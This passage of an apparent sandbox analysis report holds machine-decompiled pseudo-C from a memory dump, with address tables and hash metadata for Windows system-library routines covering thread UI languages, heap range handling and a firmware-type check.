                                                                                                                          																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                                                          																						__eflags =  *_t68;
                                                                                                                          																						_t91 =  *(_t177 + 0x20);
                                                                                                                          																						goto L74;
                                                                                                                          																					}
                                                                                                                          																				}
                                                                                                                          																			}
                                                                                                                          																			goto L35;
                                                                                                                          																		} else {
                                                                                                                          																			__eflags = _t141;
                                                                                                                          																			if(_t141 != 0) {
                                                                                                                          																				_t177 = E009FFD22(_t177);
                                                                                                                          																				__eflags = _t177;
                                                                                                                          																				if(_t177 == 0) {
                                                                                                                          																					L42:
                                                                                                                          																					_t77 = 0xc0000001;
                                                                                                                          																					goto L33;
                                                                                                                          																				} else {
                                                                                                                          																					_t130 = E009FFD9B(_t177, 0, 4);
                                                                                                                          																					__eflags = _t130;
                                                                                                                          																					if(_t130 != 0) {
                                                                                                                          																						goto L42;
                                                                                                                          																					} else {
                                                                                                                          																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                                                          																						_t91 =  *(_t177 + 0x20);
                                                                                                                          																						goto L26;
                                                                                                                          																					}
                                                                                                                          																				}
                                                                                                                          																				goto L35;
                                                                                                                          																			} else {
                                                                                                                          																				L26:
                                                                                                                          																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                                                          																				__eflags = _t94;
                                                                                                                          																				L27:
                                                                                                                          																				 *(_t177 + 0x20) = _t94;
                                                                                                                          																				__eflags = _t170 & 0x00008000;
                                                                                                                          																				if((_t170 & 0x00008000) != 0) {
                                                                                                                          																					_t95 = _a12;
                                                                                                                          																					__eflags = _t95;
                                                                                                                          																					if(_t95 != 0) {
                                                                                                                          																						_t96 =  *_t95;
                                                                                                                          																						__eflags = _t96;
                                                                                                                          																						if(_t96 != 0) {
                                                                                                                          																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                                                          																							_t40 = _t177 + 0x20;
                                                                                                                          																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                                                          																							__eflags =  *_t40;
                                                                                                                          																						}
                                                                                                                          																					}
                                                                                                                          																				}
                                                                                                                          																				goto L31;
                                                                                                                          																			}
                                                                                                                          																		}
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													} else {
                                                                                                                          														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                                                          														_t106 =  *(_t147 + 0x20);
                                                                                                                          														__eflags = _t106 & 0x00000040;
                                                                                                                          														if((_t106 & 0x00000040) != 0) {
                                                                                                                          															_t147 = E009FFD22(_t147);
                                                                                                                          															__eflags = _t147;
                                                                                                                          															if(_t147 == 0) {
                                                                                                                          																L41:
                                                                                                                          																_t130 = 0xc0000001;
                                                                                                                          																L32:
                                                                                                                          																_t77 = _t130;
                                                                                                                          																goto L33;
                                                                                                                          															} else {
                                                                                                                          																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                                                          																_t106 =  *(_t147 + 0x20);
                                                                                                                          																goto L17;
                                                                                                                          															}
                                                                                                                          															goto L35;
                                                                                                                          														} else {
                                                                                                                          															L17:
                                                                                                                          															_t108 = _t106 | 0x00000080;
                                                                                                                          															__eflags = _t108;
                                                                                                                          															 *(_t147 + 0x20) = _t108;
                                                                                                                          															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                                                          															goto L18;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L33:
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L35:
                                                                                                                          						return _t77;
                                                                                                                          					} else {
                                                                                                                          						 *_t75 = 0xab7b80;
                                                                                                                          						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                                                          						 *_t134 = _t75;
                                                                                                                          						 *0xab7b84 = _t75;
                                                                                                                          						_t73 = E009DEB70(_t134, 0xab7b60);
                                                                                                                          						if( *0xab7b20 != 0) {
                                                                                                                          							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                                                          							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                                                          								_t73 = E009DFF60( *0xab7b20);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L5;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}

















































                                                                                                                          0x009ffc27
                                                                                                                          0x009ffc75
                                                                                                                          0x009ffc7c
                                                                                                                          0x009ffc84
                                                                                                                          0x00000000
                                                                                                                          0x009ffc29
                                                                                                                          0x009ffc29
                                                                                                                          0x009ffc2d
                                                                                                                          0x009ffc30
                                                                                                                          0x00a3bf0f
                                                                                                                          0x00000000
                                                                                                                          0x009ffc36
                                                                                                                          0x009ffc38
                                                                                                                          0x009ffc3b
                                                                                                                          0x009ffc41
                                                                                                                          0x00a3bf17
                                                                                                                          0x00a3bf19
                                                                                                                          0x00a3bf48
                                                                                                                          0x00a3bf4b
                                                                                                                          0x00000000
                                                                                                                          0x00a3bf1b
                                                                                                                          0x00a3bf22
                                                                                                                          0x00a3bf24
                                                                                                                          0x00a3bf26
                                                                                                                          0x00000000
                                                                                                                          0x00a3bf2c
                                                                                                                          0x00a3bf37
                                                                                                                          0x00a3bf39
                                                                                                                          0x00a3bf3b
                                                                                                                          0x00000000
                                                                                                                          0x00a3bf41
                                                                                                                          0x00a3bf41
                                                                                                                          0x00a3bf41
                                                                                                                          0x00a3bf41
                                                                                                                          0x00a3bf45
                                                                                                                          0x00000000
                                                                                                                          0x00a3bf45
                                                                                                                          0x00a3bf3b
                                                                                                                          0x00a3bf26
                                                                                                                          0x00000000
                                                                                                                          0x009ffc47
                                                                                                                          0x009ffc47
                                                                                                                          0x009ffc49
                                                                                                                          0x009ffcb2
                                                                                                                          0x009ffcb4
                                                                                                                          0x009ffcb6
                                                                                                                          0x009ffcdc
                                                                                                                          0x009ffcdc
                                                                                                                          0x00000000
                                                                                                                          0x009ffcb8
                                                                                                                          0x009ffcc3
                                                                                                                          0x009ffcc5
                                                                                                                          0x009ffcc7
                                                                                                                          0x00000000
                                                                                                                          0x009ffcc9
                                                                                                                          0x009ffcc9
                                                                                                                          0x009ffccd
                                                                                                                          0x00000000
                                                                                                                          0x009ffccd
                                                                                                                          0x009ffcc7
                                                                                                                          0x00000000
                                                                                                                          0x009ffc4b
                                                                                                                          0x009ffc4b
                                                                                                                          0x009ffc4e
                                                                                                                          0x009ffc4e
                                                                                                                          0x009ffc51
                                                                                                                          0x009ffc51
                                                                                                                          0x009ffc54
                                                                                                                          0x009ffc5a
                                                                                                                          0x009ffc5c
                                                                                                                          0x009ffc5f
                                                                                                                          0x009ffc61
                                                                                                                          0x009ffc63
                                                                                                                          0x009ffc65
                                                                                                                          0x009ffc67
                                                                                                                          0x009ffc6e
                                                                                                                          0x009ffc72
                                                                                                                          0x009ffc72
                                                                                                                          0x009ffc72
                                                                                                                          0x009ffc72
                                                                                                                          0x009ffc67
                                                                                                                          0x009ffc61
                                                                                                                          0x00000000
                                                                                                                          0x009ffc5a
                                                                                                                          0x009ffc49
                                                                                                                          0x009ffc41
                                                                                                                          0x009ffc30
                                                                                                                          0x009ffc27
                                                                                                                          0x009ffc03
                                                                                                                          0x009ffbcd
                                                                                                                          0x009ffbd3
                                                                                                                          0x009ffbd9
                                                                                                                          0x009ffbdc
                                                                                                                          0x009ffbde
                                                                                                                          0x009ffc99
                                                                                                                          0x009ffc9b
                                                                                                                          0x009ffc9d
                                                                                                                          0x009ffcd5
                                                                                                                          0x009ffcd5
                                                                                                                          0x009ffc89
                                                                                                                          0x009ffc89
                                                                                                                          0x00000000
                                                                                                                          0x009ffc9f
                                                                                                                          0x009ffc9f
                                                                                                                          0x009ffca3
                                                                                                                          0x00000000
                                                                                                                          0x009ffca3
                                                                                                                          0x00000000
                                                                                                                          0x009ffbe4
                                                                                                                          0x009ffbe4
                                                                                                                          0x009ffbe4
                                                                                                                          0x009ffbe4
                                                                                                                          0x009ffbe9
                                                                                                                          0x009ffbf2
                                                                                                                          0x00000000
                                                                                                                          0x009ffbf2
                                                                                                                          0x009ffbde
                                                                                                                          0x009ffbcb
                                                                                                                          0x009ffbab
                                                                                                                          0x009ffc8b
                                                                                                                          0x009ffc8b
                                                                                                                          0x009ffc8c
                                                                                                                          0x009ffb80
                                                                                                                          0x009ffb72
                                                                                                                          0x009ffb5e
                                                                                                                          0x009ffc8d
                                                                                                                          0x009ffc91
                                                                                                                          0x009ffadf
                                                                                                                          0x009ffadf
                                                                                                                          0x009ffae1
                                                                                                                          0x009ffae4
                                                                                                                          0x009ffae7
                                                                                                                          0x009ffaec
                                                                                                                          0x009ffaf8
                                                                                                                          0x009ffb00
                                                                                                                          0x009ffb07
                                                                                                                          0x009ffb0f
                                                                                                                          0x009ffb0f
                                                                                                                          0x009ffb07
                                                                                                                          0x00000000
                                                                                                                          0x009ffaf8
                                                                                                                          0x009ffadd

                                                                                                                          Strings
                                                                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00A3BE0F
                                                                                                                          • x2D, xrefs: 009FFAF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$x2D
                                                                                                                          • API String ID: 0-969970170
                                                                                                                          • Opcode ID: 6481fc29d965f48c70217c37a096bc42a95a04bf21545a1d1721ed27c362c6c7
                                                                                                                          • Instruction ID: 4dd7c85e52363e78148a6d472a380a386183ce74d70f289129c622d1bc11b446
                                                                                                                          • Opcode Fuzzy Hash: 6481fc29d965f48c70217c37a096bc42a95a04bf21545a1d1721ed27c362c6c7
                                                                                                                          • Instruction Fuzzy Hash: 0DA1F371B0061D8BDB25DF68C860BBAB3A9AF84710F14457AFA56DB791EB34DC01CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00A8E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                                                                          				signed int _v20;
                                                                                                                          				char _v24;
                                                                                                                          				signed int _v40;
                                                                                                                          				char _v44;
                                                                                                                          				intOrPtr _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				unsigned int _v56;
                                                                                                                          				char _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				char _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				char _t87;
                                                                                                                          				signed int _t90;
                                                                                                                          				signed int _t94;
                                                                                                                          				signed int _t100;
                                                                                                                          				intOrPtr* _t113;
                                                                                                                          				signed int _t122;
                                                                                                                          				void* _t132;
                                                                                                                          				void* _t135;
                                                                                                                          				signed int _t139;
                                                                                                                          				signed int* _t141;
                                                                                                                          				signed int _t146;
                                                                                                                          				signed int _t147;
                                                                                                                          				void* _t153;
                                                                                                                          				signed int _t155;
                                                                                                                          				signed int _t159;
                                                                                                                          				char _t166;
                                                                                                                          				void* _t172;
                                                                                                                          				void* _t176;
                                                                                                                          				signed int _t177;
                                                                                                                          				intOrPtr* _t179;
                                                                                                                          
                                                                                                                          				_t179 = __ecx;
                                                                                                                          				_v48 = __edx;
                                                                                                                          				_v68 = 0;
                                                                                                                          				_v72 = 0;
                                                                                                                          				_push(__ecx[1]);
                                                                                                                          				_push( *__ecx);
                                                                                                                          				_push(0);
                                                                                                                          				_t153 = 0x14;
                                                                                                                          				_t135 = _t153;
                                                                                                                          				_t132 = E00A8BBBB(_t135, _t153);
                                                                                                                          				if(_t132 == 0) {
                                                                                                                          					_t166 = _v68;
                                                                                                                          					goto L43;
                                                                                                                          				} else {
                                                                                                                          					_t155 = 0;
                                                                                                                          					_v52 = 0;
                                                                                                                          					asm("stosd");
                                                                                                                          					asm("stosd");
                                                                                                                          					asm("stosd");
                                                                                                                          					asm("stosd");
                                                                                                                          					asm("stosd");
                                                                                                                          					_v56 = __ecx[1];
                                                                                                                          					if( *__ecx >> 8 < 2) {
                                                                                                                          						_t155 = 1;
                                                                                                                          						_v52 = 1;
                                                                                                                          					}
                                                                                                                          					_t139 = _a4;
                                                                                                                          					_t87 = (_t155 << 0xc) + _t139;
                                                                                                                          					_v60 = _t87;
                                                                                                                          					if(_t87 < _t139) {
                                                                                                                          						L11:
                                                                                                                          						_t166 = _v68;
                                                                                                                          						L12:
                                                                                                                          						if(_t132 != 0) {
                                                                                                                          							E00A8BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                                                                          						}
                                                                                                                          						L43:
                                                                                                                          						if(_v72 != 0) {
                                                                                                                          							_push( *((intOrPtr*)(_t179 + 4)));
                                                                                                                          							_push( *_t179);
                                                                                                                          							_push(0x8000);
                                                                                                                          							E00A8AFDE( &_v72,  &_v60);
                                                                                                                          						}
                                                                                                                          						L46:
                                                                                                                          						return _t166;
                                                                                                                          					}
                                                                                                                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                                          					asm("sbb edi, edi");
                                                                                                                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                                                                          					if(_t90 != 0) {
                                                                                                                          						_push(0);
                                                                                                                          						_push(0x14);
                                                                                                                          						_push( &_v44);
                                                                                                                          						_push(3);
                                                                                                                          						_push(_t179);
                                                                                                                          						_push(0xffffffff);
                                                                                                                          						if(E00A09730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                                                                          							_push(_t139);
                                                                                                                          							E00A8A80D(_t179, 1, _v40, 0);
                                                                                                                          							_t172 = 4;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t141 =  &_v72;
                                                                                                                          					if(E00A8A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                                                                          						_v64 = _a4;
                                                                                                                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                                          						asm("sbb edi, edi");
                                                                                                                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                                                                          						if(_t94 != 0) {
                                                                                                                          							_push(0);
                                                                                                                          							_push(0x14);
                                                                                                                          							_push( &_v24);
                                                                                                                          							_push(3);
                                                                                                                          							_push(_t179);
                                                                                                                          							_push(0xffffffff);
                                                                                                                          							if(E00A09730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                                                                          								_push(_t141);
                                                                                                                          								E00A8A80D(_t179, 1, _v20, 0);
                                                                                                                          								_t176 = 4;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(E00A8A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                                                                          							goto L11;
                                                                                                                          						} else {
                                                                                                                          							_t177 = _v64;
                                                                                                                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                                                                          							_t100 = _v52 + _v52;
                                                                                                                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                                                                          							 *(_t132 + 0x10) = _t146;
                                                                                                                          							asm("bsf eax, [esp+0x18]");
                                                                                                                          							_v52 = _t100;
                                                                                                                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                                                                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                                                                          							_t47 =  &_a8;
                                                                                                                          							 *_t47 = _a8 & 0x00000001;
                                                                                                                          							if( *_t47 == 0) {
                                                                                                                          								E009E2280(_t179 + 0x30, _t179 + 0x30);
                                                                                                                          							}
                                                                                                                          							_t147 =  *(_t179 + 0x34);
                                                                                                                          							_t159 =  *(_t179 + 0x38) & 1;
                                                                                                                          							_v68 = 0;
                                                                                                                          							if(_t147 == 0) {
                                                                                                                          								L35:
                                                                                                                          								E009DB090(_t179 + 0x34, _t147, _v68, _t132);
                                                                                                                          								if(_a8 == 0) {
                                                                                                                          									E009DFFB0(_t132, _t177, _t179 + 0x30);
                                                                                                                          								}
                                                                                                                          								asm("lock xadd [eax], ecx");
                                                                                                                          								asm("lock xadd [eax], edx");
                                                                                                                          								_t132 = 0;
                                                                                                                          								_v72 = _v72 & 0;
                                                                                                                          								_v68 = _v72;
                                                                                                                          								if(E009E7D50() == 0) {
                                                                                                                          									_t113 = 0x7ffe0388;
                                                                                                                          								} else {
                                                                                                                          									_t177 = _v64;
                                                                                                                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                          								}
                                                                                                                          								if( *_t113 == _t132) {
                                                                                                                          									_t166 = _v68;
                                                                                                                          									goto L46;
                                                                                                                          								} else {
                                                                                                                          									_t166 = _v68;
                                                                                                                          									E00A7FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                                                                          									goto L12;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								L23:
                                                                                                                          								while(1) {
                                                                                                                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                                                                          										_t122 =  *_t147;
                                                                                                                          										if(_t159 == 0) {
                                                                                                                          											L32:
                                                                                                                          											if(_t122 == 0) {
                                                                                                                          												L34:
                                                                                                                          												_v68 = 0;
                                                                                                                          												goto L35;
                                                                                                                          											}
                                                                                                                          											L33:
                                                                                                                          											_t147 = _t122;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          										if(_t122 == 0) {
                                                                                                                          											goto L34;
                                                                                                                          										}
                                                                                                                          										_t122 = _t122 ^ _t147;
                                                                                                                          										goto L32;
                                                                                                                          									}
                                                                                                                          									_t122 =  *(_t147 + 4);
                                                                                                                          									if(_t159 == 0) {
                                                                                                                          										L27:
                                                                                                                          										if(_t122 != 0) {
                                                                                                                          											goto L33;
                                                                                                                          										}
                                                                                                                          										L28:
                                                                                                                          										_v68 = 1;
                                                                                                                          										goto L35;
                                                                                                                          									}
                                                                                                                          									if(_t122 == 0) {
                                                                                                                          										goto L28;
                                                                                                                          									}
                                                                                                                          									_t122 = _t122 ^ _t147;
                                                                                                                          									goto L27;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_v72 = _v72 & 0x00000000;
                                                                                                                          					goto L11;
                                                                                                                          				}
                                                                                                                          			}




































                                                                                                                          0x00a8e700
                                                                                                                          0x00a8e700
                                                                                                                          0x00a8e704
                                                                                                                          0x00a8e70a
                                                                                                                          0x00a8e70a
                                                                                                                          0x00a8e713
                                                                                                                          0x00a8e716
                                                                                                                          0x00a8e719
                                                                                                                          0x00a8e720
                                                                                                                          0x00a8e761
                                                                                                                          0x00a8e76b
                                                                                                                          0x00a8e774
                                                                                                                          0x00a8e77a
                                                                                                                          0x00a8e77a
                                                                                                                          0x00a8e78a
                                                                                                                          0x00a8e791
                                                                                                                          0x00a8e799
                                                                                                                          0x00a8e79b
                                                                                                                          0x00a8e79f
                                                                                                                          0x00a8e7aa
                                                                                                                          0x00a8e7c0
                                                                                                                          0x00a8e7ac
                                                                                                                          0x00a8e7b2
                                                                                                                          0x00a8e7b9
                                                                                                                          0x00a8e7b9
                                                                                                                          0x00a8e7c7
                                                                                                                          0x00a8e806
                                                                                                                          0x00000000
                                                                                                                          0x00a8e7c9
                                                                                                                          0x00a8e7d1
                                                                                                                          0x00a8e7d8
                                                                                                                          0x00000000
                                                                                                                          0x00a8e7d8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8e722
                                                                                                                          0x00a8e72e
                                                                                                                          0x00a8e748
                                                                                                                          0x00a8e74c
                                                                                                                          0x00a8e754
                                                                                                                          0x00a8e756
                                                                                                                          0x00a8e75c
                                                                                                                          0x00a8e75c
                                                                                                                          0x00000000
                                                                                                                          0x00a8e75c
                                                                                                                          0x00a8e758
                                                                                                                          0x00a8e758
                                                                                                                          0x00000000
                                                                                                                          0x00a8e758
                                                                                                                          0x00a8e750
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8e752
                                                                                                                          0x00000000
                                                                                                                          0x00a8e752
                                                                                                                          0x00a8e730
                                                                                                                          0x00a8e735
                                                                                                                          0x00a8e73d
                                                                                                                          0x00a8e73f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8e741
                                                                                                                          0x00a8e741
                                                                                                                          0x00000000
                                                                                                                          0x00a8e741
                                                                                                                          0x00a8e739
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8e73b
                                                                                                                          0x00000000
                                                                                                                          0x00a8e73b
                                                                                                                          0x00a8e722
                                                                                                                          0x00a8e720
                                                                                                                          0x00a8e6b0
                                                                                                                          0x00a8e618
                                                                                                                          0x00000000
                                                                                                                          0x00a8e618

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `$`
                                                                                                                          • API String ID: 0-197956300
                                                                                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                          • Instruction ID: 74349b0bb12f43b90ba9dc29e5c63bb081345a564999f327facfc664ff5f0de0
                                                                                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                          • Instruction Fuzzy Hash: 77917D316043429FE724EF25C941B1BB7E6BF84714F18892DF9A9CB291E774E904CB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00A451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				signed short* _t63;
                                                                                                                          				signed int _t64;
                                                                                                                          				signed int _t65;
                                                                                                                          				signed int _t67;
                                                                                                                          				intOrPtr _t74;
                                                                                                                          				intOrPtr _t84;
                                                                                                                          				intOrPtr _t88;
                                                                                                                          				intOrPtr _t94;
                                                                                                                          				void* _t100;
                                                                                                                          				void* _t103;
                                                                                                                          				intOrPtr _t105;
                                                                                                                          				signed int _t106;
                                                                                                                          				short* _t108;
                                                                                                                          				signed int _t110;
                                                                                                                          				signed int _t113;
                                                                                                                          				signed int* _t115;
                                                                                                                          				signed short* _t117;
                                                                                                                          				void* _t118;
                                                                                                                          				void* _t119;
                                                                                                                          
                                                                                                                          				_push(0x80);
                                                                                                                          				_push(0xaa05f0);
                                                                                                                          				E00A1D0E8(__ebx, __edi, __esi);
                                                                                                                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                                                          				_t115 =  *(_t118 + 0xc);
                                                                                                                          				 *(_t118 - 0x7c) = _t115;
                                                                                                                          				 *((char*)(_t118 - 0x65)) = 0;
                                                                                                                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                                          				_t113 = 0;
                                                                                                                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                                                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                                                          				_t100 = __ecx;
                                                                                                                          				if(_t100 == 0) {
                                                                                                                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                                          					E009DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                          					 *((char*)(_t118 - 0x65)) = 1;
                                                                                                                          					_t63 =  *(_t118 - 0x90);
                                                                                                                          					_t101 = _t63[2];
                                                                                                                          					_t64 =  *_t63 & 0x0000ffff;
                                                                                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                                          					L20:
                                                                                                                          					_t65 = _t64 >> 1;
                                                                                                                          					L21:
                                                                                                                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                                                          					if(_t108 == 0) {
                                                                                                                          						L27:
                                                                                                                          						 *_t115 = _t65 + 1;
                                                                                                                          						_t67 = 0xc0000023;
                                                                                                                          						L28:
                                                                                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                                                          						L29:
                                                                                                                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                                                          						E00A453CA(0);
                                                                                                                          						return E00A1D130(0, _t113, _t115);
                                                                                                                          					}
                                                                                                                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                                                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                                                          							 *_t108 = 0;
                                                                                                                          						}
                                                                                                                          						goto L27;
                                                                                                                          					}
                                                                                                                          					 *_t115 = _t65;
                                                                                                                          					_t115 = _t65 + _t65;
                                                                                                                          					E00A0F3E0(_t108, _t101, _t115);
                                                                                                                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                                                          					_t67 = 0;
                                                                                                                          					goto L28;
                                                                                                                          				}
                                                                                                                          				_t103 = _t100 - 1;
                                                                                                                          				if(_t103 == 0) {
                                                                                                                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                                                          					_t74 = E009E3690(1, _t117, 0x9a1810, _t118 - 0x74);
                                                                                                                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                                                          					_t101 = _t117[2];
                                                                                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                                          					if(_t74 < 0) {
                                                                                                                          						_t64 =  *_t117 & 0x0000ffff;
                                                                                                                          						_t115 =  *(_t118 - 0x7c);
                                                                                                                          						goto L20;
                                                                                                                          					}
                                                                                                                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                                                          					_t115 =  *(_t118 - 0x7c);
                                                                                                                          					goto L21;
                                                                                                                          				}
                                                                                                                          				if(_t103 == 1) {
                                                                                                                          					_t105 = 4;
                                                                                                                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                                                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                                                          					_push(_t118 - 0x70);
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					_push(_t105);
                                                                                                                          					_push(_t118 - 0x78);
                                                                                                                          					_push(0x6b);
                                                                                                                          					 *((intOrPtr*)(_t118 - 0x64)) = E00A0AA90();
                                                                                                                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                                          					_t113 = L009E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                                                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                                                          					if(_t113 != 0) {
                                                                                                                          						_push(_t118 - 0x70);
                                                                                                                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                                                          						_push(_t113);
                                                                                                                          						_push(4);
                                                                                                                          						_push(_t118 - 0x78);
                                                                                                                          						_push(0x6b);
                                                                                                                          						_t84 = E00A0AA90();
                                                                                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                                                          						if(_t84 < 0) {
                                                                                                                          							goto L29;
                                                                                                                          						}
                                                                                                                          						_t110 = 0;
                                                                                                                          						_t106 = 0;
                                                                                                                          						while(1) {
                                                                                                                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                                                          							 *(_t118 - 0x88) = _t106;
                                                                                                                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                                                          							_t106 = _t106 + 1;
                                                                                                                          						}
                                                                                                                          						_t88 = E00A4500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                                                          						_t119 = _t119 + 0x1c;
                                                                                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                                                          						if(_t88 < 0) {
                                                                                                                          							goto L29;
                                                                                                                          						}
                                                                                                                          						_t101 = _t118 - 0x3c;
                                                                                                                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                                                          						goto L21;
                                                                                                                          					}
                                                                                                                          					_t67 = 0xc0000017;
                                                                                                                          					goto L28;
                                                                                                                          				}
                                                                                                                          				_push(0);
                                                                                                                          				_push(0x20);
                                                                                                                          				_push(_t118 - 0x60);
                                                                                                                          				_push(0x5a);
                                                                                                                          				_t94 = E00A09860();
                                                                                                                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                                                          				if(_t94 < 0) {
                                                                                                                          					goto L29;
                                                                                                                          				}
                                                                                                                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                                                          					_t101 = L"Legacy";
                                                                                                                          					_push(6);
                                                                                                                          				} else {
                                                                                                                          					_t101 = L"UEFI";
                                                                                                                          					_push(4);
                                                                                                                          				}
                                                                                                                          				_pop(_t65);
                                                                                                                          				goto L21;
                                                                                                                          			}























                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
